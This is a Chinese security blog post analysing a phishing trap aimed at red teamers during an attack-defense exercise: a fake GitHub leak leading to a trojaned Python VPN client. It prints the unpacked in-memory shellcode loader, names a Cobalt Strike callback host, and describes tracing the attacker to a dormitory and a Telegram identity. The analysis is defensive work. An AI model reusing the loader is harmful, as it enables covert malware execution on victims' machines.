实战 | 记一次某次攻防演练种的分析溯源

admin 2022年6月29日11:24:40安全文章实战 | 记一次某次攻防演练种的分析溯源已关闭评论6 views1763字阅读5分52秒阅读模式

在某次攻防演练信息收集的过程中,偶然发现伪装Github信息泄漏进而钓鱼红队人员的后门。


下面展开有趣的分析溯源过程。

0x01 信息收集

GIthub信息泄漏


根据甲方信息进行常规的Github敏感信息收集偶然发现一个仓库不简单


图片


这不是mysql账号密码泄漏了吗,愉快的打开Navicat


图片


失败....


于是访问源码的8080端口查看一番,发现一个管理后台


图片

弱口令


针对后台尝试一波弱口令,admin/admin 嗯~进来了


图片


进来之后竟然发现账号密码而且客户端解压密码都贴心的放了出来


图片


到这里我竟然没有察觉到任何异常,以为能够拿到VPN入口权限;抓紧下载VPN客户端。


解压出来这个样子,emmm。。还没发现异常


图片

分析溯源


还好有谨慎的习惯,放入虚拟机瞅瞅。


哦豁,竟然提示不兼容当前系统;看到弹窗有Pyhton代码编写的特征。感觉到前面的打点由过于丝滑,不自然的警觉了起来。


包括前面弱口令的提交方式竟然为admin.php?user=admin&passwd=admin

图片


由于发现VPN客户端为python语言编写,更不对劲了,反编译看下。


解包


python3 pyinstxtractor.py vpnclient64.exe

图片


生成一个以 exe文件名+_extracted 的文件夹,这个就是解包后的数据


图片

图片

PyInstaller打包后,pyc文件的前8个字节会被抹掉,所以最后要自己添加回去。


添加头


根据struct.py文件


图片

图片

源码


得到py文件,easyvpn64.py为后门主程序,其中执行shellcode代码隐藏至图片中


图片


通过requests请求OSS存储中的图片,图片内容为shellcode加载器。


图片


shellcodeLoader部分


图片

import base64import ctypesstr = b''sc_base64 = (base64.a85decode(str)).decode('utf-8')shellcode = bytearray(bytearray.fromhex((base64.b64decode(sc_base64)).decode('utf-8')))ptr = ctypes.windll.kernel32.VirtualAlloc.restype = ctypes.c_uint64ptr = ctypes.windll.kernel32.VirtualAlloc(ctypes.c_int(0), ctypes.c_int(len(shellcode)), ctypes.c_int(0x3000),
ctypes.c_int(0x40))buf = (ctypes.c_char * len(shellcode)).from_buffer(shellcode)ctypes.windll.kernel32.RtlMoveMemory(ctypes.c_uint64(ptr), buf, ctypes.c_int(len(shellcode)))handle = ctypes.windll.kernel32.CreateThread(ctypes.c_int(0), ctypes.c_int(0), ctypes.c_uint64(ptr), ctypes.c_int(0),
ctypes.c_int(0), ctypes.pointer(ctypes.c_int(0)))ctypes.windll.kernel32.WaitForSingleObject(ctypes.c_int(handle), ctypes.c_int(-1))


知道shellcodeloader加载方式就好办了,提取CS回连地址。


图片

溯源


回连地址:Host: cs.xxx.cn


nslookup解析地址


图片


根据IP地址定位在某宿舍


图片


直接溯源到人,tg结合一波。


图片

总结


在攻防演练过程中一定要小心,防止被钓鱼。另外这个钓鱼的兄弟已经小本本记下了。。。


作者:Kat

原文地址:https://xz.aliyun.com/t/11275

往期推荐

实战|对某一网站的渗透测试


RuoYI CMS 漏洞利用面面观


JustTrustMe 原理分析


Shiro还能这样玩[第二弹]| 再遇某CMS-shiro的小技巧


图片

特别标注: 本站(CN-SEC.COM)所有文章仅供技术研究,若将其信息做其他用途,由用户承担全部法律及连带责任,本站不承担任何法律及连带责任,请遵守中华人民共和国安全法.
  • 我的微信
  • 微信扫一扫
  • weinxin
  • 我的微信公众号
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2022年6月29日11:24:40
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                  实战 | 记一次某次攻防演练种的分析溯源 http://cn-sec.com/archives/1148437.html